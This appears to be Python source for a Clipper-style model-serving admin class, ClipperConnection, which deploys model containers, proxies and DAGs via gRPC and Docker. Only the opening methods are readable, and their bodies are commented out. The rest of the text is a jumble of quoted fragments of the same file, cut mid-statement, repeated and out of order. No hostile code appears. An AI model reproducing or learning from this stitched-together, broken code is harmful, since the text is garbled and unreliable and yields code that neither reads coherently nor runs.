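    # Typical use of the query address (the endpoint path shown here is
    # illustrative and depends on the deployed frontend's REST API):
    #
    #   addr = clipper_conn.get_query_addr()
    #   requests.post("http://{}/predict".format(addr), json={"input": [1.0]})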
    def stop_models(self, model_names):
        """Stops all versions of the specified models.

        This is a convenience method to avoid the need to explicitly list all
        versions of a model when calling
        :py:meth:`clipper_admin.ClipperConnection.stop_versioned_models`.

        Parameters
        ----------
        model_names : list(str)
            A list of model names. All replicas of all versions of each model
            specified in the list will be stopped.

        Raises
        ------
        :py:exc:`clipper.UnconnectedException`
        """
        # if not self.connected:
        #     raise UnconnectedException()
        # model_info = self.get_all_models(verbose=True)
        # model_dict = {}
        # for m in model_info:
        #     if m["model_name"] in model_names:
        #         if m["model_name"] in model_dict:
        #             model_dict[m["model_name"]].append(m["model_version"])
        #         else:
        #             model_dict[m["model_name"]] = [m["model_version"]]
        # self.cm.stop_models(model_dict)
        # pp = pprint.PrettyPrinter(indent=4)
        # self.logger.info(
        #     "Stopped all containers for these models and versions:\n{}".format(
        #         pp.pformat(model_dict)))

    def stop_versioned_models(self, model_versions_dict):
        """Stops the specified versions of the specified models.

        Parameters
        ----------
        model_versions_dict : dict(str, list(str))
            For each entry in the dict, the key is a model name and the value
            is a list of model versions. All replicas for each version of each
            model will be stopped.

        Raises
        ------
        :py:exc:`clipper.UnconnectedException`

        Note
        ----
        This method will stop the currently deployed versions of models if
        you specify them. You almost certainly want to use one of the other
        stop_* methods. Use with caution.
        """
        # if not self.connected:
        #     raise UnconnectedException()
        # self.cm.stop_models(model_versions_dict)
        # pp = pprint.PrettyPrinter(indent=4)
        # self.logger.info(
        #     "Stopped all containers for these models and versions:\n{}".format(
        #         pp.pformat(model_versions_dict)))
Raises ------ :py:exc:`clipper.UnconnectedException`", "StringIO import StringIO PY3 = False else: from io import", "the tar file # Seek back to beginning of file", "of each model will be stopped. \"\"\" if not self.connected:", "backup_host = self.cm.add_replica(model_name, model_version, \"22222\", model_image) self.logger.info(\"[Backup] Started %s with", "apt-get -y install build-essential && pip install'.split( ' ') run_cmd", "'RUN apt-get -y install build-essential && pip install'.split( ' ')", "\"validation is '{reg}'\".format( version=version, reg=deploy_regex_str)) class ClipperConnection(object): def __init__(self, container_manager):", "proxy_id = self.cm.set_proxy(\"mxschen/ai-proxy:latest\", container_name, container_ip, host) ## get the ip", "self.logger.warning(\"Error starting Clipper: {}\".format(e.msg)) raise e def connect(self): \"\"\"Connect to", "as e: # self.logger.info(\"Clipper still initializing: \\n {}\".format(e)) # time.sleep(1)", "\"--addmodel %s %s %s \"%(\"localhost\",\"33333\", modelinfo)) return def deploy_DAG(self, name,", "{}\".format(e.msg)) raise e def connect(self): \"\"\"Connect to a running Clipper", "Mode. This parameter will take not effect in Kubernetes. \"\"\"", "proxy_id) proxy_info.append([proxy_name,proxy_id,proxy_ip]) container_info.append([container_name, container_id, container_ip]) if graph_parser.is_stateful(model_info): backup_name, backup_id, backup_host", "method to avoid the need to explicitly list all versions", "backup_info, frontend_info) self.runtime_dag = expanded_dag # TODO: need to modularize", "All replicas of all versions of each model specified in", "= tup[0] proxy_id = tup[1] proxy_ip = tup[2] self.cm.grpc_client(\"zsxhku/grpcclient\", \"--setdag", "df_contents.seek(0) context_tar.addfile(df_tarinfo, df_contents) # Exit Tarfile context manager to finish", "# format='%(asctime)s %(levelname)-8s [%(filename)s:%(lineno)d] %(message)s', # datefmt='%y-%m-%d:%H:%M:%S', # level=logging.INFO) logger", "m[\"model_name\"] in model_dict: # model_dict[m[\"model_name\"]].append(m[\"model_version\"]) # else: # model_dict[m[\"model_name\"]] =", "to proxy') if(graph_parser.is_stateful(model_info)): self.cm.grpc_client(\"zsxhku/grpcclient\", \"--setmodel %s %s %s %s %s", "container_registry=None, num_replicas=1, batch_size=-1, pkgs_to_install=None): if not self.connected: raise UnconnectedException() image", "address at which the query frontend can be reached request", "numpy as np from google.protobuf.json_format import MessageToDict if sys.version_info <", "# pp.pformat(model_versions_dict))) def stop_inactive_model_versions(self, model_names): \"\"\"Stops all model containers serving", "pkgs_to_install) with tempfile.NamedTemporaryFile( mode=\"w+b\", suffix=\"tar\") as context_file: # Create build", "datefmt='%y-%m-%d:%H:%M:%S', level=logging.INFO) # logging.basicConfig( # format='%(asctime)s %(levelname)-8s [%(filename)s:%(lineno)d] %(message)s', #", "for proxy {proxy_name} '.format(proxy_name=proxy_name)) #tells the backups runtime dag info", "\"http://{host}/admin/ping\".format( # host=self.cm.get_admin_addr()) # for name, url in [('query frontend',", "# raise UnconnectedException() # model_info = self.get_all_models(verbose=True) # model_dict =", "model containers. 
If you started Redis independently, this will not", "is running\") self.connected = True except ClipperException as e: self.logger.warning(\"Error", "ClusterAdapter from .exceptions import ClipperException, UnconnectedException from .version import __version__,", "and 3 of model \"music_recommender\" and version 3 is the", "DEFAULT_PREDICTION_CACHE_SIZE_BYTES = 33554432 CLIPPER_TEMP_DIR = \"/tmp/clipper\" # Used Internally for", "proxy {proxy_name} '.format(proxy_name=tup[-1])) return def inspect_instance(self): \"\"\"Fetches performance metrics from", ".container_manager import CONTAINERLESS_MODEL_IMAGE, ClusterAdapter from .exceptions import ClipperException, UnconnectedException from", "except RequestException as e: # self.logger.info(\"Clipper still initializing: \\n {}\".format(e))", "model_names : list(str) The names of the models whose old", "%s %s %s\"%(backup_info[-1][-1], \"22223\", backup_info[-1][0], count, backup_info[-1][2], \"22222\" )) self.logger.info('[DEPLOYMENT][Backup]", "# Exit Tarfile context manager to finish the tar file", "avoid the need to explicitly list all versions of a", "host) ## get the ip of the instances proxy_ip =", "frontend_container_id, frontend_ip] self.logger.info(\"[DEPLOYMENT] ################ Started Frontend #################\") #expand the dag", "You almost certainly want to use one of the other", "self.cm.get_query_addr())) def build_and_deploy_DAG(self, name, version, dag_description, labels): if not self.connected:", "# dag_description_=self.get_dag_description() nodes_list = graph_parser.get_all_nodes(dag_description_) container_info = [] proxy_info =", "model Raises ------ :py:exc:`clipper.UnconnectedException` versions. All replicas for each version", "import sys from cloudpickle import CloudPickler import pickle import numpy", "in model_names: # if m[\"model_name\"] in model_dict: # model_dict[m[\"model_name\"]].append(m[\"model_version\"]) #", "r.status_code != requests.codes.ok: # raise RequestException( # \"{name} end point", "\"Successfully connected to Clipper cluster at {}\".format( self.cm.get_query_addr())) def build_and_deploy_DAG(self,", "file # Seek back to beginning of file for reading", "(HOST:%s)\"%(model_name, container_name, container_id, host)) container_ip = self.cm.get_container_ip(host, container_id) proxy_name, proxy_id", "you specify them. You almost certainly want to use one", "pkgs_to_install=None): if not self.connected: raise UnconnectedException() image = self.build_model(name, version,", "model containers\") def stop_all(self, graceful=True): \"\"\"Stops all processes that were", "\" \"validation is '{reg}'\".format(name=name, reg=deploy_regex_str)) if deployment_regex.match(version) is None: raise", "error message (not JSON formatted). Raises ------ :py:exc:`clipper.UnconnectedException` :py:exc:`clipper.ClipperException` \"\"\"", "%(message)s', datefmt='%y-%m-%d:%H:%M:%S', level=logging.INFO) # logging.basicConfig( # format='%(asctime)s %(levelname)-8s [%(filename)s:%(lineno)d] %(message)s',", "methods. Use with caution. \"\"\" # if not self.connected: #", "if pkgs_to_install: run_as_lst = 'RUN apt-get -y install build-essential &&", "valid DNS-1123 \" \" subdomain. 
It must consist of lower", "import management_pb2 from .rpc import management_pb2_grpc from .container_manager import CONTAINERLESS_MODEL_IMAGE,", "= self.build_model(name, version, model_data_path, base_image, container_registry, pkgs_to_install) self.deploy_model(name, version, input_type,", "from .rpc import management_pb2_grpc from .container_manager import CONTAINERLESS_MODEL_IMAGE, ClusterAdapter from", "docker_client.images.build( fileobj=context_file, custom_context=True, tag=image) for b in build_logs: if 'stream'", "------ :py:exc:`clipper.UnconnectedException` \"\"\" # if not self.connected: # raise UnconnectedException()", "is None: raise ClipperException( \"Invalid value: {version}: a model version", "models. This is a convenience method to avoid the need", "num_replicas, batch_size) def build_model(self, name, version, model_data_path, base_image, container_registry=None, pkgs_to_install=None):", ":py:exc:`clipper.ClipperException` \"\"\" def get_query_addr(self): \"\"\"Get the IP address at which", "backup_id, backup_ip, backup_proxy_name, backup_proxy_id, backup_proxy_ip]) else: backup_info.append([]) #self.cm.check_container_status(host, container_id, 0.3,", "serving versions 1 and 2 but will leave containers serving", "m in model_info: # if m[\"model_name\"] in model_names: # if", "parameter will take not effect in Kubernetes. \"\"\" self.cm.stop_all(graceful=graceful) self.logger.info(", "e def connect(self): \"\"\"Connect to a running Clipper cluster.\"\"\" self.cm.connect()", "from . import graph_parser DEFAULT_LABEL = [] DEFAULT_PREDICTION_CACHE_SIZE_BYTES = 33554432", "prediction_pb2 from .rpc import management_pb2 from .rpc import management_pb2_grpc from", "containers started via Clipper admin commands. This method can be", "model_names): \"\"\"Stops all versions of the specified models. This is", "%s %s %s %s %s %s\"%(proxy_ip, \"22223\", container_name, count, container_ip,", "sys.version_info < (3, 0): try: from cStringIO import StringIO except", "started via Clipper admin commands. This method can be used", "import requests from requests.exceptions import RequestException import json import pprint", "str(version) _validate_versioned_model_name(name, version) self.cm.deploy_model( name=name, version=version, input_type=input_type, image=image, num_replicas=num_replicas) #", "ClipperException( \"Invalid value: {version}: a model version must be a", "\"{name} end point {url} health check failed\".format(name=name, url=url)) # break", "each version of each model will be stopped. \"\"\" #", "model') # if(graph_parser.is_stateful(model_info)): # self.cm.grpc_client(\"zsxhku/grpcclient\", \"--setproxy %s %s %s %s\"%(backup_info[-1][2],", "= container_manager #############TEST################ self.runtime_dag = \"\" self.lock = False #################################", "model info to proxy') count += 1 # self.cm.grpc_client(\"zsxhku/grpcclient\", \"--setproxy", "name=name, version=version) if container_registry is not None: image = \"{reg}/{image}\".format(", "Clipper admin commands. This method can be used to clean", "ClipperException as e: self.logger.warning(\"Error starting Clipper: {}\".format(e.msg)) raise e def", "context_tar.addfile(df_tarinfo, df_contents) except TypeError: df_contents = StringIO( \"FROM {container_name}\\n{run_command}\\nCOPY {data_path}", "of the specified models. 
This is a convenience method to", "%s %s %s\"%(backup_info[-1][2], \"22222\", backup_info[-1][3], \"22223\")) # self.logger.info('[DEPLOYMENT][Backup] Finished setting", "format( container_name=base_image, data_path=model_data_path, run_command=run_cmd)) df_tarinfo = tarfile.TarInfo('Dockerfile') df_contents.seek(0, os.SEEK_END) df_tarinfo.size", "self.logger.info( \"Building model Docker image with model data from {}\".format(", "labels=None, num_replicas=1, batch_size=-1): if not self.connected: raise UnconnectedException() version =", "UnconnectedException() def build_and_deploy_model(self, name, version, input_type, model_data_path, base_image, labels=None, container_registry=None,", "started Redis independently, this will not affect Redis. It can", "for these models and versions:\\n{}\".format( # pp.pformat(model_dict))) def stop_all_model_containers(self): \"\"\"Stops", "1, 2, and 3 of model \"music_recommender\" and version 3", "batch_size=batch_size) self.logger.info(\"Done deploying model {name}:{version}.\".format( name=name, version=version)) def connect_host(self, host_ip,", "#self.cm.check_container_status(host, proxy_id, 0.3, 20) #time.sleep(25) #self.logger.info(\"proxy_ip:%s\"%(proxy_ip)) self.cm.grpc_client(\"zsxhku/grpcclient\", \"--setmodel %s %s", "of model names. All replicas of all versions of each", "container_name, container_id, host = self.cm.add_replica(model_name, model_version, \"22222\", model_image, runtime=runtime) self.logger.info(\"Started", "stopped. Raises ------ :py:exc:`clipper.UnconnectedException` versions. All replicas for each version", "tup[1] proxy_ip = tup[2] self.cm.grpc_client(\"zsxhku/grpcclient\", \"--setdag %s %s %s\"%(proxy_ip, \"22223\",", "query_frontend_url = \"http://{host}/metrics\".format( # host=self.cm.get_query_addr()) # mgmt_frontend_url = \"http://{host}/admin/ping\".format( #", "= [] DEFAULT_PREDICTION_CACHE_SIZE_BYTES = 33554432 CLIPPER_TEMP_DIR = \"/tmp/clipper\" # Used", "if not self.connected: # raise UnconnectedException() # self.cm.stop_models(model_versions_dict) # pp", ": list(str) A list of model names. All replicas of", "consist of lower case \" \"alphanumeric characters, '-' or '.',", "{version}: a model version must be a valid DNS-1123 \"", "PY3 = True import grpc from .rpc import model_pb2_grpc from", "\"22223\", container_name, count, container_ip, \"22222\" )) self.logger.info('[DEPLOYMENT] Finished setting model", "all versions of each model specified in the list will", "batch_size=-1, pkgs_to_install=None): if not self.connected: raise UnconnectedException() image = self.build_model(name,", "reg=container_registry, image=image) docker_client = docker.from_env() self.logger.info( \"Building model Docker image", "Started Frontend #################\") #expand the dag description with the model/proxy", "container_ip = self.cm.get_container_ip(host, container_id) proxy_name, proxy_id = self.cm.set_proxy(\"mxschen/ai-proxy:latest\", container_name, container_ip,", "self.connected: raise UnconnectedException() image = self.build_model(name, version, model_data_path, base_image, container_registry,", "also be called without calling ``connect`` first. \"\"\" self.cm.stop_all_model_containers() self.logger.info(\"Stopped", "RequestException as e: # self.logger.info(\"Clipper still initializing: \\n {}\".format(e)) #", "containing the current set of metrics for this instance. 
On", "datefmt='%y-%m-%d:%H:%M:%S', # level=logging.INFO) logger = logging.getLogger(__name__) deploy_regex_str = \"[a-z0-9]([-a-z0-9]*[a-z0-9])?\\Z\" deployment_regex", "and versions:\\n{}\".format( # pp.pformat(model_versions_dict))) def stop_inactive_model_versions(self, model_names): \"\"\"Stops all model", "name, url in [('query frontend', query_frontend_url), # ('management frontend', mgmt_frontend_url)]:", "self.cm.connect() self.connected = True self.logger.info( \"Successfully connected to Clipper cluster", "'.', and must start and end with \" \"an alphanumeric", "first. \"\"\" self.cm.stop_all_model_containers() self.logger.info(\"Stopped all Clipper model containers\") def stop_all(self,", "will stop any containers serving versions 1 and 2 but", "%(levelname)-8s [%(filename)s:%(lineno)d] %(message)s', # datefmt='%y-%m-%d:%H:%M:%S', # level=logging.INFO) logger = logging.getLogger(__name__)", "count, container_ip, \"22222\" )) self.logger.info('[DEPLOYMENT] Finished setting model info to", "the list will be stopped. Raises ------ :py:exc:`clipper.UnconnectedException` versions. All", "names. All replicas of all versions of each model specified", "\"--setmodel %s %s %s %s %s %s\"%(backup_info[-1][-1], \"22223\", backup_info[-1][0], count,", "pprint import time import re import os import tarfile import", "from .rpc import model_pb2_grpc from .rpc import model_pb2 from .rpc", "%s %s %s %s\"%(backup_info[-1][-1], \"22223\", backup_info[-1][0], count, backup_info[-1][2], \"22222\" ))", "string will be an error message (not JSON formatted). Raises", "runtime dag info for tup in backup_info: if tup: self.cm.grpc_client(\"zsxhku/grpcclient\",", "self.cm.get_container_ip(backup_host, backup_id) backup_proxy_name, backup_proxy_id = self.cm.set_proxy(\"mxschen/ai-proxy:latest\", backup_name, backup_ip, backup_host) backup_proxy_ip=", "\"22222\", backup_info[-1][3], \"22223\")) # self.logger.info('[DEPLOYMENT][Backup] Finished setting proxy info to", ".version import __version__, __registry__ from . import graph_parser DEFAULT_LABEL =", "proxy_name, proxy_id = self.cm.set_proxy(\"mxschen/ai-proxy:latest\", container_name, container_ip, host) ## get the", "import tempfile import requests from requests.exceptions import RequestException import json", "model_data_path, base_image, container_registry, pkgs_to_install) self.deploy_model(name, version, input_type, image, labels, num_replicas,", "context_file.seek(0) image = \"{cluster}-{name}:{version}\".format( cluster=self.cm.cluster_identifier, name=name, version=version) if container_registry is", "The names of the models whose old containers you want", "\"{cluster}-{name}:{version}\".format( cluster=self.cm.cluster_identifier, name=name, version=version) if container_registry is not None: image", "import MessageToDict if sys.version_info < (3, 0): try: from cStringIO", "specified versions of the specified models. 
Parameters ---------- model_versions_dict :", "version=version, input_type=input_type, image=image, num_replicas=num_replicas) # self.register_model( # name, # version,", "Clipper model containers\") def stop_all(self, graceful=True): \"\"\"Stops all processes that", "def deploy_DAG(self, name, version, dag_description=None, runtime=\"\"): if not self.connected: raise", "= graph_parser.get_all_nodes(dag_description_) container_info = [] proxy_info = [] backup_info =", "context manager to finish the tar file # Seek back", "container_name, count, container_ip, \"22222\" )) self.logger.info('[DEPLOYMENT] Finished setting model info", "cluster. Returns ------- str The JSON string containing the current", "you started Redis independently, this will not affect Redis. It", "formatted). Raises ------ :py:exc:`clipper.UnconnectedException` :py:exc:`clipper.ClipperException` \"\"\" def get_query_addr(self): \"\"\"Get the", "self.deploy_model(name, version, input_type, image, labels, num_replicas, batch_size) def build_model(self, name,", "regex used for \" \"validation is '{reg}'\".format( version=version, reg=deploy_regex_str)) class", "= self.cm.get_container_ip(host, container_id) proxy_name, proxy_id = self.cm.set_proxy(\"mxschen/ai-proxy:latest\", container_name, container_ip, host)", "labels=labels, # batch_size=batch_size) self.logger.info(\"Done deploying model {name}:{version}.\".format( name=name, version=version)) def", "tup: self.cm.grpc_client(\"zsxhku/grpcclient\", \"--setdag %s %s %s\"%(tup[-1], \"22223\", expanded_dag)) self.logger.info('[DEPLOYMENT][Backup] Finished", "self.cm.stop_all(graceful=graceful) self.logger.info( \"Stopped all Clipper cluster and all model containers\")", "(e.g. 'example.com', regex used for \" \"validation is '{reg}'\".format(name=name, reg=deploy_regex_str))", "# pp.pformat(model_dict))) def stop_versioned_models(self, model_versions_dict): \"\"\"Stops the specified versions of", "model when calling :py:meth:`clipper_admin.ClipperConnection.stop_versioned_models`. Parameters ---------- model_names : list(str) A", "(not JSON formatted). Raises ------ :py:exc:`clipper.UnconnectedException` :py:exc:`clipper.ClipperException` \"\"\" def get_query_addr(self):", "%s %s %s \"%(\"localhost\",\"33333\", modelinfo)) return def deploy_DAG(self, name, version,", "level=logging.INFO) # logging.basicConfig( # format='%(asctime)s %(levelname)-8s [%(filename)s:%(lineno)d] %(message)s', # datefmt='%y-%m-%d:%H:%M:%S',", "query and management frontend Docker containers and all model containers.", "# if m[\"model_name\"] in model_dict: # model_dict[m[\"model_name\"]].append(m[\"model_version\"]) # else: #", "model \"music_recommender\" and version 3 is the current version:: clipper_conn.stop_inactive_model_versions([\"music_recommender\"])", "# query_frontend_url = \"http://{host}/metrics\".format( # host=self.cm.get_query_addr()) # mgmt_frontend_url = \"http://{host}/admin/ping\".format(", "each version of each model will be stopped. 
Note ----", "in model_names and not m[\"is_current_version\"]: # if m[\"model_name\"] in model_dict:", "%s %s\"%(tup[-1], \"22223\", expanded_dag)) self.logger.info('[DEPLOYMENT][Backup] Finished setting DAG for proxy", "return self.cm.get_query_addr() def stop_models(self, model_names): \"\"\"Stops all versions of the", "# From https://stackoverflow.com/a/740854/814642 try: df_contents = StringIO( str.encode( \"FROM {container_name}\\n{run_command}\\nCOPY", "self.lock = False ################################# self.logger = ClusterAdapter(logger, { 'cluster_name': self.cm.cluster_identifier", "################ Started Frontend #################\") #expand the dag description with the", "to avoid the need to explicitly list all versions of", "version=version, reg=deploy_regex_str)) class ClipperConnection(object): def __init__(self, container_manager): self.connected = False", "%s %s\"%(backup_info[-1][-1], \"22223\", backup_info[-1][0], count, backup_info[-1][2], \"22222\" )) self.logger.info('[DEPLOYMENT][Backup] Finished", "and b['stream'] != '\\n': #log build steps only self.logger.info(b['stream'].rstrip()) self.logger.info(\"Pushing", "This includes the query and management frontend Docker containers and", "health check failed\".format(name=name, url=url)) # break # except RequestException as", "were started via Clipper admin commands. This includes the query", "or Redis has crashed. It can also be called without", "will be an error message (not JSON formatted). Raises ------", "proxy') if(graph_parser.is_stateful(model_info)): self.cm.grpc_client(\"zsxhku/grpcclient\", \"--setmodel %s %s %s %s %s %s\"%(backup_info[-1][-1],", "add_model(self, model_name, model_version, image, input_type=\"string\", output_type=\"string\", stateful=False): modelinfo = management_pb2.ModelInfo(modelname=model_name,", "nodes_list = graph_parser.get_all_nodes(dag_description_) container_info = [] proxy_info = [] backup_info", "containers and all model containers. If you started Redis independently,", "these models and versions:\\n{}\".format( # pp.pformat(model_dict))) def stop_all_model_containers(self): \"\"\"Stops all", "('management frontend', mgmt_frontend_url)]: # r = requests.get(url, timeout=5) # if", "container_registry, pkgs_to_install) self.deploy_model(name, version, input_type, image, labels, num_replicas, batch_size) def", "## Starting frontend frontend_name, frontend_container_id = self.cm.add_frontend(\"localhost\", \"mxschen/frontend\",runtime_dag_id, proxy_info[0][2], \"22223\",", "self.logger.info( # \"Stopped all containers for these models and versions:\\n{}\".format(", "import docker import tempfile import requests from requests.exceptions import RequestException", "TypeError: df_contents = StringIO( \"FROM {container_name}\\n{run_command}\\nCOPY {data_path} /model/\\n\". format( container_name=base_image,", "model_info: # if m[\"model_name\"] in model_names and not m[\"is_current_version\"]: #", "certainly want to use one of the other stop_* methods.", "build_and_deploy_DAG(self, name, version, dag_description, labels): if not self.connected: raise UnconnectedException()", "the current set of metrics for this instance. On error,", "inspect_instance(self): \"\"\"Fetches performance metrics from the running Clipper cluster. Returns", "import grpc from .rpc import model_pb2_grpc from .rpc import model_pb2", "will leave containers serving version 3 untouched. Parameters ---------- model_names", "``connect`` first. 
\"\"\" self.cm.stop_all_model_containers() self.logger.info(\"Stopped all Clipper model containers\") def", "docker_client.images.push(repository=image, stream=True): self.logger.debug(line) return image def deploy_model(self, name, version, input_type,", "model containers serving stale versions of the specified models. For", "of each model will be stopped. Note ---- This method", "the instances proxy_ip = self.cm.get_container_ip(host, proxy_id) proxy_info.append([proxy_name,proxy_id,proxy_ip]) container_info.append([container_name, container_id, container_ip])", "= self.get_all_models() dag_description_ = dag_description #self.logger.info(\"dag_description: %s\"%(dag_description_)) #if(dag_description==None): # dag_description_=self.get_dag_description()", "\"--setproxy %s %s %s %s\"%(container_ip, \"22222\", proxy_name, \"22223\")) # self.logger.info('[DEPLOYMENT]", "------ :py:exc:`clipper.UnconnectedException` :py:exc:`clipper.ClipperException` \"\"\" def get_query_addr(self): \"\"\"Get the IP address", "list all versions of a model when calling :py:meth:`clipper_admin.ClipperConnection.stop_versioned_models`. Parameters", "False else: from io import BytesIO as StringIO PY3 =", "mgmt_frontend_url = \"http://{host}/admin/ping\".format( # host=self.cm.get_admin_addr()) # for name, url in", "# r = requests.get(url, timeout=5) # if r.status_code != requests.codes.ok:", "version 3 is the current version:: clipper_conn.stop_inactive_model_versions([\"music_recommender\"]) will stop any", "%s %s %s\"%('1', name, version, 'old' , self.cm.admin_ip, self.cm.admin_port, expanded_dag))", "self.cm.get_container_ip(\"localhost\", frontend_container_id) frontend_info = [frontend_name, frontend_container_id, frontend_ip] self.logger.info(\"[DEPLOYMENT] ################ Started", "tempfile.NamedTemporaryFile( mode=\"w+b\", suffix=\"tar\") as context_file: # Create build context tarfile", "= False self.cm = container_manager #############TEST################ self.runtime_dag = \"\" self.lock", "container_ip, host) ## get the ip of the instances proxy_ip", "cluster.\"\"\" self.cm.connect() self.connected = True self.logger.info( \"Successfully connected to Clipper", "model_versions_dict): \"\"\"Stops the specified versions of the specified models. Parameters", "%s %s\"%(backup_info[-1][2], \"22222\", backup_info[-1][3], \"22223\")) # self.logger.info('[DEPLOYMENT][Backup] Finished setting proxy", "_validate_versioned_model_name(name, version) run_cmd = '' if pkgs_to_install: run_as_lst = 'RUN", "an error message (not JSON formatted). Raises ------ :py:exc:`clipper.UnconnectedException` :py:exc:`clipper.ClipperException`", "# self.logger.info( # \"Stopped all containers for these models and", "stop the currently deployed versions of models if you specify", "characters, '-' or '.', and must start and end with", "Frontend #################\") #expand the dag description with the model/proxy instances", "self.logger.info(\"Stopped all Clipper model containers\") def stop_all(self, graceful=True): \"\"\"Stops all", "str(version) _validate_versioned_model_name(name, version) run_cmd = '' if pkgs_to_install: run_as_lst =", "stop_* methods. Use with caution. 
\"\"\" # if not self.connected:", "new runtime DAG to admin daemon\\n%s\"%(expanded_dag)) #tells the proxy runtime", "def add_model(self, model_name, model_version, image, input_type=\"string\", output_type=\"string\", stateful=False): modelinfo =", "self.get_all_models() dag_description_ = dag_description #self.logger.info(\"dag_description: %s\"%(dag_description_)) #if(dag_description==None): # dag_description_=self.get_dag_description() nodes_list", "image = self.build_model(name, version, model_data_path, base_image, container_registry, pkgs_to_install) self.deploy_model(name, version,", "to use one of the other stop_* methods. Use with", "an IP address or hostname. Raises ------ :py:exc:`clipper.UnconnectedException` versions. All", "+= 1 # self.cm.grpc_client(\"zsxhku/grpcclient\", \"--setproxy %s %s %s %s\"%(container_ip, \"22222\",", "raise RequestException( # \"{name} end point {url} health check failed\".format(name=name,", "caution. \"\"\" # if not self.connected: # raise UnconnectedException() #", "image=image, # labels=labels, # batch_size=batch_size) self.logger.info(\"Done deploying model {name}:{version}.\".format( name=name,", "self.cm.get_query_addr() def stop_models(self, model_names): \"\"\"Stops all versions of the specified", "Redis independently, this will not affect Redis. It can also", "without calling ``connect`` first. If graceful=False, Clipper will issue Docker", "from cloudpickle import CloudPickler import pickle import numpy as np", "if deployment_regex.match(version) is None: raise ClipperException( \"Invalid value: {version}: a", "# model_info = self.get_all_models(verbose=True) # model_dict = {} # for", "# host=self.cm.get_query_addr()) # mgmt_frontend_url = \"http://{host}/admin/ping\".format( # host=self.cm.get_admin_addr()) # for", "called without calling ``connect`` first. If graceful=False, Clipper will issue", "the running Clipper cluster. Returns ------- str The JSON string", "each model specified in the list will be stopped. Raises", "predictions. Returns ------- str The address as an IP address", "data_path=model_data_path, run_command=run_cmd))) df_tarinfo = tarfile.TarInfo('Dockerfile') df_contents.seek(0, os.SEEK_END) df_tarinfo.size = df_contents.tell()", "backups runtime dag info for tup in backup_info: if tup:", "name, version, dag_description, labels): if not self.connected: raise UnconnectedException() def", "self.cm.get_container_ip(backup_host, backup_proxy_id) backup_info.append([backup_name, backup_id, backup_ip, backup_proxy_name, backup_proxy_id, backup_proxy_ip]) else: backup_info.append([])", "frontend or Redis has crashed. It can also be called", "'.format(proxy_name=proxy_name)) #tells the backups runtime dag info for tup in", "or '.', and must start and end with \" \"an", "raise UnconnectedException() def build_and_deploy_model(self, name, version, input_type, model_data_path, base_image, labels=None,", "{}\".format( model_data_path)) image_result, build_logs = docker_client.images.build( fileobj=context_file, custom_context=True, tag=image) for", "{data_path} /model/\\n\". 
format( container_name=base_image, data_path=model_data_path, run_command=run_cmd))) df_tarinfo = tarfile.TarInfo('Dockerfile') df_contents.seek(0,", "__version__), cache_size=DEFAULT_PREDICTION_CACHE_SIZE_BYTES): try: self.cm.start_clipper(mgmt_frontend_image) # while True: # try: #", "\"--setdag %s %s %s\"%(proxy_ip, \"22223\", expanded_dag)) self.logger.info('[DEPLOYMENT] Finished setting DAG", "labels=None, container_registry=None, num_replicas=1, batch_size=-1, pkgs_to_install=None): if not self.connected: raise UnconnectedException()", "\"--addruntimedag %s %s %s %s %s %s %s\"%('1', name, version,", "name=name, version=version, input_type=input_type, image=image, num_replicas=num_replicas) # self.register_model( # name, #", "2 but will leave containers serving version 3 untouched. Parameters", "\"{reg}/{image}\".format( reg=container_registry, image=image) docker_client = docker.from_env() self.logger.info( \"Building model Docker", "\"Stopped all containers for these models and versions:\\n{}\".format( # pp.pformat(model_dict)))", "stopped. \"\"\" # if not self.connected: # raise UnconnectedException() #", "\"/tmp/clipper\" # Used Internally for Test; Not Windows Compatible logging.basicConfig(", "not self.connected: raise UnconnectedException() def build_and_deploy_model(self, name, version, input_type, model_data_path,", "of the models whose old containers you want to stop.", "DAG to admin daemon\\n%s\"%(expanded_dag)) #tells the proxy runtime dag info", "df_contents.seek(0, os.SEEK_END) df_tarinfo.size = df_contents.tell() df_contents.seek(0) context_tar.addfile(df_tarinfo, df_contents) except TypeError:", "Compatible logging.basicConfig( format='%(asctime)s %(levelname)-8s %(message)s', datefmt='%y-%m-%d:%H:%M:%S', level=logging.INFO) # logging.basicConfig( #", "be a valid DNS-1123 \" \" subdomain. It must consist", "of model Raises ------ :py:exc:`clipper.UnconnectedException` versions. All replicas for each", "0): try: from cStringIO import StringIO except ImportError: from StringIO", "proxy') count += 1 # self.cm.grpc_client(\"zsxhku/grpcclient\", \"--setproxy %s %s %s", "%s %s %s %s %s %s\"%(backup_info[-1][-1], \"22223\", backup_info[-1][0], count, backup_info[-1][2],", "'.join(run_as_lst + pkgs_to_install) with tempfile.NamedTemporaryFile( mode=\"w+b\", suffix=\"tar\") as context_file: #", "On error, the string will be an error message (not", "versions of the specified models. 
Parameters ---------- model_versions_dict : dict(str,", "the ip of the instances proxy_ip = self.cm.get_container_ip(host, proxy_id) proxy_info.append([proxy_name,proxy_id,proxy_ip])", "deployment_regex.match(version) is None: raise ClipperException( \"Invalid value: {version}: a model", "= [frontend_name, frontend_container_id, frontend_ip] self.logger.info(\"[DEPLOYMENT] ################ Started Frontend #################\") #expand", "context_file: # Create build context tarfile with tarfile.TarFile( fileobj=context_file, mode=\"w\")", "backup_info.append([]) #self.cm.check_container_status(host, container_id, 0.3, 20) #self.cm.check_container_status(host, proxy_id, 0.3, 20) #time.sleep(25)", "#if(dag_description==None): # dag_description_=self.get_dag_description() nodes_list = graph_parser.get_all_nodes(dag_description_) container_info = [] proxy_info", "all model containers serving stale versions of the specified models.", "\"%(\"localhost\",\"33333\", modelinfo)) return def deploy_DAG(self, name, version, dag_description=None, runtime=\"\"): if", "pkgs_to_install: run_as_lst = 'RUN apt-get -y install build-essential && pip", "version, dag_description=None, runtime=\"\"): if not self.connected: raise UnconnectedException() # model_info", "version 3 untouched. Parameters ---------- model_names : list(str) The names", "# datefmt='%y-%m-%d:%H:%M:%S', # level=logging.INFO) logger = logging.getLogger(__name__) deploy_regex_str = \"[a-z0-9]([-a-z0-9]*[a-z0-9])?\\Z\"", "backup_name, backup_id, backup_host = self.cm.add_replica(model_name, model_version, \"22222\", model_image) self.logger.info(\"[Backup] Started", "model info to proxy') if(graph_parser.is_stateful(model_info)): self.cm.grpc_client(\"zsxhku/grpcclient\", \"--setmodel %s %s %s", "cloudpickle import CloudPickler import pickle import numpy as np from", "{container_name}\\n{run_command}\\nCOPY {data_path} /model/\\n\". format( container_name=base_image, data_path=model_data_path, run_command=run_cmd)) df_tarinfo = tarfile.TarInfo('Dockerfile')", "info for tup in proxy_info: proxy_name = tup[0] proxy_id =", "setting proxy info to model') # if(graph_parser.is_stateful(model_info)): # 